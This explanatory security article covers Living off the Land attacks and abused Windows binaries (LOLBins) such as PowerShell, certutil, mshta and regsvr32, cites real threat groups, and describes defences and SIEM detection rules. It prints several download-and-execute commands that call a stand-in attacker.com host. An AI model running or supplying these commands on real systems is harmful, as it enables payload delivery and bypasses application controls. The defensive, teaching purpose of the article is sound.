Attackers have learned that carrying their own weapons into a target environment is risky — custom malware gets detected, signatures get written, files get flagged. So instead, they use the tools already present on the system. This strategy is called Living off the Land (LotL), and the legitimate system binaries they abuse are known as LOLBins — Living off the Land Binaries.
The result is attacks that blend into normal system activity, leave minimal forensic traces, and often defeat traditional signature-based antivirus entirely.
What Are LOLBins?
LOLBins are legitimate, often Microsoft-signed executables that ship with Windows (or Linux/macOS) and can be abused to perform malicious actions. These binaries are trusted by the operating system, whitelisted by many security tools, and generate logs that look like normal administrative activity.
The LOLBAS project (lolbas-project.github.io) catalogs hundreds of such binaries. Each entry documents what the binary can do legitimately and how it can be abused for:
- Code execution — running attacker-supplied code
- Download — fetching payloads from the internet
- Bypass — circumventing security controls
- Persistence — maintaining access after reboots
- Lateral movement — spreading across the network
Most Abused LOLBins
PowerShell
PowerShell is the most heavily abused LotL tool in Windows environments. It provides a full scripting environment with direct access to .NET APIs, WMI, the Windows registry, COM objects, and network functions. Attackers use it to:
- Download and execute malware in memory without touching disk
- Encode commands in Base64 to evade string-based detection
- Enumerate Active Directory for lateral movement targets
- Establish reverse shells
Example abuse: powershell -enc [Base64-encoded-payload] — the -enc flag accepts a Base64-encoded command, a common evasion technique.
certutil.exe
certutil is a Windows certificate management utility. But it can also download files from the internet and decode Base64 — making it a popular downloader for malware payloads.
certutil -urlcache -split -f http://attacker.com/payload.exe payload.exeThis command downloads a file from an attacker’s server. Because certutil is a signed Microsoft binary used legitimately in enterprise environments, it was historically overlooked by many security tools.
mshta.exe
mshta (Microsoft HTML Application Host) runs HTA files — HTML applications with access to Windows scripting. Attackers use it to execute VBScript or JScript payloads directly from URLs:
mshta http://attacker.com/payload.htaThis technique has been used extensively by groups like APT32 (OceanLotus) and FIN7.
wmic.exe (Windows Management Instrumentation)
WMIC allows querying and controlling Windows systems. Attackers use it for lateral movement (executing commands on remote machines), process creation, and persistence.
regsvr32.exe (Squiblydoo)
regsvr32 registers COM components. The “Squiblydoo” technique uses it to download and execute a remote scriptlet, bypassing application whitelisting:
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dllThis technique was used in real attacks and prompted Microsoft to eventually address it in later Windows versions.
bitsadmin.exe
BITS (Background Intelligent Transfer Service) is used for Windows Update transfers. Attackers use bitsadmin to schedule downloads that persist through reboots and blend with legitimate update traffic.
Other Notable LOLBins
| Binary | Abuse Type |
|---|---|
wscript.exe / cscript.exe | Script execution (VBScript, JScript) |
rundll32.exe | Execute DLL functions directly |
msiexec.exe | Install remote MSI packages |
forfiles.exe | Execute commands for each file found |
odbcconf.exe | Load and execute DLLs via ODBC config |
installutil.exe | Execute .NET assemblies, bypassing AppLocker |
cmstp.exe | Bypass UAC and execute remote scripts |
Real-World LotL Attack Examples
APT29 / Cozy Bear
The Russian SVR-linked group APT29 is well-documented for LotL techniques. In the SolarWinds supply chain attack and subsequent intrusions, they used PowerShell, WMI, and legitimate cloud services (Microsoft Graph API, Dropbox, Google Drive) as command-and-control channels to blend in with normal business traffic.
FIN7
The financially motivated FIN7 group used PowerShell extensively alongside legitimate tools like Meterpreter (a penetration testing payload) to move laterally through retail and hospitality networks, exfiltrating payment card data over months-long dwell times.
Hafnium (Exchange Server Attacks)
After exploiting ProxyLogon vulnerabilities in Microsoft Exchange, the Chinese-linked Hafnium group used built-in Windows tools including PowerShell and certutil to deploy webshells and exfiltrate data, minimizing their use of custom malware.
Scattered Spider
The Scattered Spider (UNC3944) group, responsible for high-profile casino breaches in 2023, used legitimate remote management tools (AnyDesk, TeamViewer) alongside PowerShell and Azure Active Directory components to maintain access and move laterally — classic LotL.
Why LotL Is So Effective
Blending in: Legitimate admin tools generate logs that look identical to malicious use. A PowerShell command run by an attacker looks the same as one run by a sysadmin.
Trust by default: These binaries are signed by Microsoft and trusted by application whitelisting solutions unless those solutions are carefully configured.
Fileless execution: Many LotL attacks execute entirely in memory, leaving no files on disk for traditional antivirus to scan.
Bypassing traditional AV: Signature-based detection is essentially useless against PowerShell scripts or certutil downloads because the tools themselves are legitimate.
How to Defend Against LotL Attacks
Constrained Language Mode for PowerShell
Enable PowerShell Constrained Language Mode in environments where full PowerShell functionality is not required. Pair with Script Block Logging and Module Logging to capture what PowerShell commands are actually executing.
Application Control / Whitelisting
Implement Windows Defender Application Control (WDAC) or AppLocker to restrict which binaries can execute, and more specifically, what those binaries can do. Blocking mshta.exe, certutil downloads, and regsvr32 remote loading removes major attack vectors.
Behavioral Detection (EDR)
Modern Endpoint Detection and Response tools like CrowdStrike Falcon, Microsoft Defender for Endpoint, and SentinelOne use behavioral analytics rather than signatures. They detect patterns like “certutil downloading an executable” or “PowerShell spawning a network connection” even when no malware file exists.
Privileged Access Workstations (PAWs)
Restrict which machines can run powerful tools like PowerShell with full language mode, and limit administrative tool usage to designated workstations.
Monitor for Known LotL Indicators
Use SIEM rules to alert on:
- PowerShell with
-encor-EncodedCommandflags - certutil with URL parameters
- mshta spawned with HTTP/HTTPS arguments
- WMIC executing remote process creation
Network Segmentation
Even if an attacker abuses LotL tools to move laterally, proper network segmentation limits how far they can go. Blocking unnecessary SMB, WMI, and RDP access between workstations significantly reduces the blast radius.
The Bottom Line
Living off the land attacks exploit a fundamental tension in endpoint security: the tools administrators need to do their jobs are the same tools attackers use to compromise systems. Effective defense requires behavioral monitoring, not just signature blocking — watching what tools do, not just which tools run. In environments where SOC visibility is strong and EDR coverage is complete, LotL attacks become significantly harder to sustain silently.